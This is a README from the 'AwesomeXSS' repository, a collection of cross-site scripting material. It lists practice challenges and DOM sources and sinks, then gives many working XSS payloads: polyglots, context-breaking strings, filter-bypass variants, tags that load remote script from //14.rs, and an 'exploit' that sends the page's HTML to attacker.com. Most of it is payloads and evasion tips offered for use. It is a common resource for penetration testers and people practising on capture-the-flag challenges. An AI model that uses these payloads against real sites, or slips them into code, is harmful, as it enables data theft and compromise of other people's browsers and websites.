343 lines
11 KiB
JavaScript
343 lines
11 KiB
JavaScript
# AwesomeXSS
|
|
Awesome XSS stuff.
|
|
Put this repo on watch. I will be updating it regularly.
|
|
|
|
### Awesome Challenges
|
|
- [prompt.ml](https://prompt.ml)
|
|
- [alf.nu/alert1](https://alf.nu/alert1)
|
|
- [s-p-o-o-k-y.com](https://www.s-p-o-o-k-y.com)
|
|
- [xss-game.appspot.com](https://xss-game.appspot.com)
|
|
- [polyglot.innerht.ml](https://polyglot.innerht.ml)
|
|
- [sudo.co.il/xss](http://sudo.co.il/xss)
|
|
- [hack.me/t/XSS](https://hack.me/t/XSS)
|
|
- [root-me.org](https://www.root-me.org/?page=recherche&lang=en&recherche=xss)
|
|
- [chefsecure.com](https://chefsecure.com/courses/xss/challenges)
|
|
- [wechall.net](https://www.wechall.net/challs/XSS)
|
|
|
|
### Awesome Reads & Presentations
|
|
- [Bypassing XSS Detection Mechanisms](https://github.com/s0md3v/MyPapers/tree/master/Bypassing-XSS-detection-mechanisms)
|
|
- [XSS in Sarahah](http://www.shawarkhan.com/2017/08/sarahah-xss-exploitation-tool.html)
|
|
- [XSS in Facebook via PNG Content Type](https://whitton.io/articles/xss-on-facebook-via-png-content-types/)
|
|
- [How I met your girlfriend](https://www.youtube.com/watch?v=fWk_rMQiDGc)
|
|
- [How to Find 1,352 Wordpress XSS Plugin Vulnerabilities in one hour](https://www.youtube.com/watch?v=9ADubsByGos)
|
|
- [Blind XSS](https://www.youtube.com/watch?v=OT0fJEtz7aE)
|
|
- [Copy Pest](https://www.slideshare.net/x00mario/copypest)
|
|
|
|
### Awesome Tools
|
|
- [XSStrike](https://github.com/UltimateHackers/XSStrike)
|
|
- [xsshunter.com](https://xsshunter.com)
|
|
- [BeEF](https://github.com/beefproject/beef)
|
|
- [JShell](https://github.com/UltimateHackers/JShell)
|
|
|
|
### Awesome XSS Mind Maps
|
|
A beutiful XSS mind map by Jack Masa, [here](https://github.com/s0md3v/AwesomeXSS/blob/master/Database/jackmasa-mind-map.png)
|
|
|
|
### Awesome DOM XSS
|
|
|
|
- Does your input go into a sink? `Vulnerable`
|
|
- It doesn't? `Not vulnerable`
|
|
|
|
**Source**: An input that could be controlled by an external (untrusted) source.
|
|
|
|
```
|
|
document.URL
|
|
document.documentURI
|
|
document.URLUnencoded (IE 5.5 or later Only)
|
|
document.baseURI
|
|
location
|
|
location.href
|
|
location.search
|
|
location.hash
|
|
location.pathname
|
|
document.cookie
|
|
document.referrer
|
|
window.name
|
|
history.pushState()
|
|
history.replaceState()
|
|
localStorage
|
|
sessionStorage
|
|
```
|
|
|
|
**Sink**: A potentially dangerous method that could lead to a vulnerability. In this case a DOM Based XSS.
|
|
|
|
```
|
|
eval
|
|
Function
|
|
setTimeout
|
|
setInterval
|
|
setImmediate
|
|
execScript
|
|
crypto.generateCRMFRequest
|
|
ScriptElement.src
|
|
ScriptElement.text
|
|
ScriptElement.textContent
|
|
ScriptElement.innerText
|
|
anyTag.onEventName
|
|
document.write
|
|
document.writeln
|
|
anyElement.innerHTML
|
|
Range.createContextualFragment
|
|
window.location
|
|
document.location
|
|
```
|
|
|
|
This comprehensive list of sinks and source is taken from [domxsswiki](https://github.com/wisec/domxsswiki).
|
|
|
|
### Awesome Payloads
|
|
```
|
|
<A/hREf="j%0aavas%09cript%0a:%09con%0afirm%0d``">z
|
|
<d3"<"/onclick="1>[confirm``]"<">z
|
|
<d3/onmouseenter=[2].find(confirm)>z
|
|
<details open ontoggle=confirm()>
|
|
<script y="><">/*<script* */prompt()</script
|
|
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
|
|
<a href="javascript%26colon;alert(1)">click
|
|
<a href=javascript:alert(1)>click
|
|
<script/"<a"/src=data:=".<a,[8].some(confirm)>
|
|
<svg/x=">"/onload=confirm()//
|
|
<--`<img/src=` onerror=confirm``> --!>
|
|
<svg%0Aonload=%09((pro\u006dpt))()//
|
|
<sCript x>(((confirm)))``</scRipt x>
|
|
<svg </onload ="1> (_=prompt,_(1)) "">
|
|
<!--><script src=//14.rs>
|
|
<embed src=//14.rs>
|
|
<script x=">" src=//15.rs></script>
|
|
<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
|
|
<iframe/src \/\/onload = prompt(1)
|
|
<x oncut=alert()>x
|
|
<svg onload=write()>
|
|
```
|
|
|
|
### Awesome Polyglots
|
|
|
|
Here's an XSS polyglot that I made which can break out of 20+ contexts:
|
|
```
|
|
%0ajavascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
|
|
```
|
|
|
|
Explanation of how it works, [here](https://github.com/s0md3v/AwesomeXSS/blob/master/Database/polyglot.png)
|
|
|
|
### Awesome Tags & Event Handlers
|
|
- [105 Event Handlers with description](https://github.com/UltimateHackers/AwesomeXSS/blob/master/Database/event-handlers.md)
|
|
- [200 Event Handlers without description](http://pastebin.com/raw/WwcBmz5J)
|
|
|
|
Some less detected event handlers
|
|
```
|
|
ontoggle
|
|
onauxclick
|
|
ondblclick
|
|
oncontextmenu
|
|
onmouseleave
|
|
ontouchcancel
|
|
```
|
|
|
|
Some HTML Tags that you will be using
|
|
```
|
|
img
|
|
svg
|
|
body
|
|
html
|
|
embed
|
|
script
|
|
object
|
|
details
|
|
isindex
|
|
iframe
|
|
audio
|
|
video
|
|
```
|
|
|
|
### Awesome Context Breaking
|
|
|
|
#### HTML Context
|
|
Case: `<tag>You searched for $input. </tag>`
|
|
|
|
```
|
|
<svg onload=alert()>
|
|
</tag><svg onload=alert()>
|
|
```
|
|
|
|
#### Attribute Context
|
|
|
|
Case: `<tag attribute="$input">`
|
|
|
|
```
|
|
"><svg onload=alert()>
|
|
"><svg onload=alert()><b attr="
|
|
" onmouseover=alert() "
|
|
"onmouseover=alert()//
|
|
"autocous/onfocus="alert()
|
|
```
|
|
#### JavaScript Context
|
|
|
|
Case: `<script> var new something = '$input'; </script>`
|
|
|
|
```
|
|
'-alert()-'
|
|
'-alert()//'
|
|
'}alert(1);{'
|
|
'}%0Aalert(1);%0A{'
|
|
</script><svg onload=alert()>
|
|
```
|
|
|
|
### Awesome Confirm Variants
|
|
Yep, confirm because alert is too mainstream.
|
|
```
|
|
confirm()
|
|
confirm``
|
|
(confirm``)
|
|
{confirm``}
|
|
[confirm``]
|
|
(((confirm)))``
|
|
co\u006efirm()
|
|
new class extends confirm``{}
|
|
[8].find(confirm)
|
|
[8].map(confirm)
|
|
[8].some(confirm)
|
|
[8].every(confirm)
|
|
[8].filter(confirm)
|
|
[8].findIndex(confirm)
|
|
```
|
|
|
|
### Awesome Exploits
|
|
##### Replace all links
|
|
```javascript
|
|
Array.from(document.getElementsByTagName("a")).forEach(function(i) {
|
|
i.href = "https://attacker.com";
|
|
});
|
|
```
|
|
##### Source Code Stealer
|
|
```html
|
|
<svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">
|
|
```
|
|
A good compilation of advanced XSS exploits can be found [here](http://www.xss-payloads.com/payloads-list.html?a#category=all)
|
|
|
|
### Awesome Probing
|
|
If nothing of this works, take a look at **Awesome Bypassing** section
|
|
|
|
First of all, enter a non-malicious string like **d3v** and look at the source code to get an idea about number and contexts of refelections.
|
|
<br>Now for attribute context, check if double quotes (") are being filtered by entering `x"d3v`. If it gets altered to `x"d3v`, chances are that output is getting properly escaped. If this happens, try doing the same for single quotes (') by entering `x'd3v`, if it gets altered to `x'`, you are doomed. The only thing you can try is encoding.<br>
|
|
If the quotes are not being filtered, you can simply try payloads from **Awesome Context Breaking** section.
|
|
<br>For javascript context, check which quotes are being used for example if they are doing
|
|
```
|
|
variable = 'value' or variable = "value"
|
|
```
|
|
Now lets say single quotes (') are in use, in that case enter `x'd3v`. If it gets altered to `x\\'d3v`, try escaping the backslash (\) by adding a backslash to your probe i.e. `x\\'d3v`. If it works use the following payload:
|
|
```
|
|
\'-alert()//
|
|
```
|
|
But if it gets altered to `x\\\\'d3v`, the only thing you can try is closing the script tag itself by using
|
|
```
|
|
</script><svg onload=alert()>
|
|
```
|
|
For simple HTML context, the probe is `x<d3v`. If it gets altered to `x>d3v`, proper sanitization is in place. If it gets reflected as it as, you can enter a dummy tag to check for potenial filters. The dummy tag I like to use is `x<xxx>`. If it gets stripped or altered in any way, it means the filter is looking for a pair of `<` and `>`. It can simply bypassed using
|
|
```
|
|
<svg onload=alert()//
|
|
```
|
|
or this (it will not work in all cases)
|
|
```
|
|
<svg onload=alert()
|
|
```
|
|
If the your dummy tags lands in the source code as it is, go for any of these payloads
|
|
```
|
|
<svg onload=alert()>
|
|
<embed src=//14.rs>
|
|
<details open ontoggle=alert()>
|
|
```
|
|
|
|
### Awesome Bypassing
|
|
|
|
**Note:** None of these payloads use single (') or double quotes (").
|
|
|
|
- Without event handlers
|
|
```
|
|
<object data=javascript:confirm()>
|
|
<a href=javascript:confirm()>click here
|
|
<script src=//14.rs></script>
|
|
<script>confirm()</script>
|
|
```
|
|
- Without space
|
|
```
|
|
<svg/onload=confirm()>
|
|
<iframe/src=javascript:alert(1)>
|
|
```
|
|
- Without slash (/)
|
|
```
|
|
<svg onload=confirm()>
|
|
<img src=x onerror=confirm()>
|
|
```
|
|
- Without equal sign (=)
|
|
```
|
|
<script>confirm()</script>
|
|
```
|
|
- Without closing angular bracket (>)
|
|
```
|
|
<svg onload=confirm()//
|
|
```
|
|
- Without alert, confirm, prompt
|
|
```
|
|
<script src=//14.rs></script>
|
|
<svg onload=co\u006efirm()>
|
|
<svg onload=z=co\u006efir\u006d,z()>
|
|
```
|
|
- Without a Valid HTML tag
|
|
```
|
|
<x onclick=confirm()>click here
|
|
<x ondrag=aconfirm()>drag it
|
|
```
|
|
|
|
- Bypass tag blackilisting
|
|
```
|
|
</ScRipT>
|
|
</script
|
|
</script/>
|
|
</script x>
|
|
```
|
|
|
|
### Awesome Encoding
|
|
|
|
|HTML|Char|Numeric|Description|Hex|CSS (ISO)|JS (Octal)|URL|
|
|
|----|----|-------|-----------|----|--------|----------|---|
|
|
|`"`|"|`"`|quotation mark|u+0022|\0022|\42|%22|
|
|
|`#`|#|`#`|number sign|u+0023|\0023|\43|%23|
|
|
|`$`|$|`$`|dollar sign|u+0024|\0024|\44|%24|
|
|
|`%`|%|`%`|percent sign|u+0025|\0025|\45|%25|
|
|
|`&`|`&|`&`|ampersand|u+0026|\0026|\46|%26|
|
|
|`'`|'|`'`|apostrophe|u+0027|\0027|\47|%27|
|
|
|`(`|(|`(`|left parenthesis|u+0028|\0028|\50|%28|
|
|
|`)`|)|`)`|right parenthesis|u+0029|\0029|\51|%29|
|
|
|`*`|*|`*`|asterisk|u+002A|\002a|\52|%2A|
|
|
|`+`|+|`+`|plus sign|u+002B|\002b|\53|%2B|
|
|
|`,`|,|`,`|comma|u+002C|\002c|\54|%2C|
|
|
|`−`|-|`-`|hyphen-minus|u+002D|\002d|\55|%2D|
|
|
|`.`|.|`.`|full stop; period|u+002E|\002e|\56|%2E|
|
|
|`/`|/|`/`|solidus; slash|u+002F|\002f|\57|%2F|
|
|
|`:`|:|`:`|colon|u+003A|\003a|\72|%3A|
|
|
|`;`|;`|`;`|semicolon|u+003B|\003b|\73|%3B|
|
|
|`<`|<|`<`|less-than|u+003C|\003c|\74|%3C|
|
|
|`=`|=|`=`|equals|u+003D|\003d|\75|%3D|
|
|
|`>`|>|`>`|greater-than sign|u+003E|\003e|\76|%3E|
|
|
|`?`|?|`?`|question mark|u+003F|\003f|\77|%3F|
|
|
|`@`|@|`@`|at sign; commercial at|u+0040|\0040|\100|%40|
|
|
|`[`|\[|`[`|left square bracket|u+005B|\005b|\133|%5B|
|
|
|`\`|/|`\`|backslash|u+005C|\005c|\134|%5C|
|
|
|`]`|]|`]`|right square bracket|u+005D|\005d|\135|%5D|
|
|
|`^`|^|`^`|circumflex accent|u+005E|\005e|\136|%5E|
|
|
|`_`|_|`_`|low line|u+005F|\005f|\137|%5F|
|
|
|```|\`|```|grave accent|u+0060|\0060|\u0060|%60|
|
|
|`{`|{|`{`|left curly bracket|u+007b|\007b|\173|%7b|
|
|
|`|`|\||`|`|vertical bar|u+007c|\007c|\174|%7c|
|
|
|`}`|}|`}`|right curly bracket|u+007d|\007d|\175|%7d|
|
|
|
|
### Awesome Tips & Tricks
|
|
- `http(s)://` can be shortened to `//` or `/\\` or `\\`.
|
|
- `document.cookie` can be shortened to `cookie`. It applies to other DOM objects as well.
|
|
- alert and other pop-up functions don't need a value, so stop doing `alert('XSS')` and start doing `alert()`
|
|
- You can use `//` to close a tag instead of `>`.
|
|
- I have found that `confirm` is the least detected pop-up function so stop using `alert`.
|
|
- Quotes around attribute value aren't neccessary as long as it doesn't contain spaces. You can use `<script src=//14.rs>` instead of `<script src="//14.rs">`
|
|
- The shortest HTML context XSS payload is `<script src=//14.rs>` (19 chars)
|
|
|
|
### Awesome Credits
|
|
All the payloads are crafted by me unless specified.
|